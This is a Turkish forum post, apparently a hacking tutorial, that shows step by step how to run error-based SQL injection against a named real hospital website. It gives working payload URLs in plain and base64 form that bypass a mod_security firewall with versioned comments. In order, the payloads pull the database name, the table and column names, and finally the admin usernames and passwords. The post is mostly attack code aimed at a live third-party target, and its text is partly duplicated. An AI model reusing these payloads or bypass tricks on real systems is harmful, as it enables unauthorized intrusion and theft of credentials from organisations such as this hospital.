Selamun Aleyküm ....
bu konumuzda'da xpath injectiondan bahsedeceğim.. Örnek Sitemiz ;
şimdi url sonunda gördüğünüz gibi " news-d.php?id=Nw== " var,
ben hemen "==" görünce base64 olduğunu anlıyor ve decode ediyorum .
Nw== "7 " sayısını veriyor bize. yani url şu şekilde ;
Tamam şimdi ' koyalım ve base64 çevirelim.
Tamam sql hatamızı da aldık. çok uzatmadan "URL Balancer" denediğim de ekrana direk 7' -- -çıktısı verdi,
bunun üzerine dedim ki eee bu direk benim yazdığımı ekrana yazdırıyor çıktı olarak veriyor ise ya error based'dır, yada xpath dir.
xpath ile database çekmeye çalıştığımda mod_security ile karşılaştım.
Waffı bypassladım,
Tamam db adını öğrendik
Database adı : themissi_missiondb
sıra geldi tablolarımızı yazdırmaya,
şansımıza ilk tablo "mh_admin" sıra geldi kolonlarımızı çekmeye,
Sırayla limit değerini arttırdığımız zaman(0arttırıyoruz) "name" ve "password" kolonunu ulaşmış olduk.
Son işlem sıra geldi dump etmeye,
Evet umarım faydalı bir konu olmuştur sizin içinde..
sağlıcakla kalın...
bu konumuzda'da xpath injectiondan bahsedeceğim.. Örnek Sitemiz ;
Kod:
https://www.themissionhospital.com/news-d.php?id=Nw==
şimdi url sonunda gördüğünüz gibi " news-d.php?id=Nw== " var,
ben hemen "==" görünce base64 olduğunu anlıyor ve decode ediyorum .
Nw== "7 " sayısını veriyor bize. yani url şu şekilde ;
Kod:
https://www.themissionhospital.com/news-d.php?id=7
Kod:
https://www.themissionhospital.com/news-d.php?id=Nyc=
Tamam sql hatamızı da aldık. çok uzatmadan "URL Balancer" denediğim de ekrana direk 7' -- -çıktısı verdi,
bunun üzerine dedim ki eee bu direk benim yazdığımı ekrana yazdırıyor çıktı olarak veriyor ise ya error based'dır, yada xpath dir.
xpath ile database çekmeye çalıştığımda mod_security ile karşılaştım.
Kod:
https://www.themissionhospital.com/news-d.php?id=7and extractvalue(0x0a,concat(0x0a,(select database())))
Kod:
https://www.themissionhospital.com/news-d.php?id=NyBhbmQgZXh0cmFjdHZhbHVlKDB4MGEsY29uY2F0KDB4MGEsKHNlbGVjdCBkYXRhYmFzZSgpKSkp
Waffı bypassladım,
Kod:
https://www.themissionhospital.com/news-d.php?id=7 and /*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,(/*!50000select*/ database())))
Kod:
https://www.themissionhospital.com/news-d.php?id=NyBhbmQgLyohNTAwMDBleHRyYWN0dmFsdWUqLygweDBhLC8qITUwMDAwY29uY2F0Ki8oMHgwYSwoLyohNTAwMDBzZWxlY3QqLyBkYXRhYmFzZSgpKSkp
Tamam db adını öğrendik
Database adı : themissi_missiondb
sıra geldi tablolarımızı yazdırmaya,
Kod:
[B]https://www.themissionhospital.com/news-d.php?id=[/B][B]7 and /*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,(/*!50000select*/ table_name /*!50000from*/ /*!50000information_schema*/.tables where table_schema=database() limit 0,1)))[/B]
Kod:
[B]https://www.themissionhospital.com/news-d.php?id=NyBhbmQgLyohNTAwMDBleHRyYWN0dmFsdWUqLygweDBhLC8qITUwMDAwY29uY2F0Ki8oMHgwYSwoLyohNTAwMDBzZWxlY3QqLyB0YWJsZV9uYW1lIC8qITUwMDAwZnJvbSovCiAvKiE1MDAwMGluZm9ybWF0aW9uX3NjaGVtYSovLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBsaW1pdCAwLDEpKSkK[/B]
şansımıza ilk tablo "mh_admin" sıra geldi kolonlarımızı çekmeye,
Kod:
[B][B]https://www.themissionhospital.com/news-d.php?id=7 and /*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,(/*!50000select*/ column_name /*!50000from*/ /*!50000information_schema*/.columns where table_name=0x6d685f61646d696e limit 0,1)))
[/B][/B]
Kod:
[B]https://www.themissionhospital.com/news-d.php?id=NyBhbmQgLyohNTAwMDBleHRyYWN0dmFsdWUqLygweDBhLC8qITUwMDAwY29uY2F0Ki8oMHgwYSwoLyohNTAwMDBzZWxlY3QqLyBjb2x1bW5fbmFtZSAvKiE1MDAwMGZyb20qLwogLyohNTAwMDBpbmZvcm1hdGlvbl9zY2hlbWEqLy5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9MHg2ZDY4NWY2MTY0NmQ2OTZlIGxpbWl0IDAsMSkpKQ==[/B]
Son işlem sıra geldi dump etmeye,
Kod:
https://www.themissionhospital.com/news-d.php?id=7 and /*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,(/*!50000select*/ /*!50000concat*/(name,0x3a3a,password) from mh_admin limit 0,1)))
Kod:
https://www.themissionhospital.com/news-d.php?id=NyBhbmQgLyohNTAwMDBleHRyYWN0dmFsdWUqLygweDBhLC8qITUwMDAwY29uY2F0Ki8oMHgwYSwoLyohNTAwMDBzZWxlY3QqLyAvKiE1MDAwMGNvbmNhdCovCihuYW1lLDB4M2EzYSxwYXNzd29yZCkgZnJvbSBtaF9hZG1pbiBsaW1pdCAwLDEpKSk=
Evet umarım faydalı bir konu olmuştur sizin içinde..
sağlıcakla kalın...
Son düzenleme: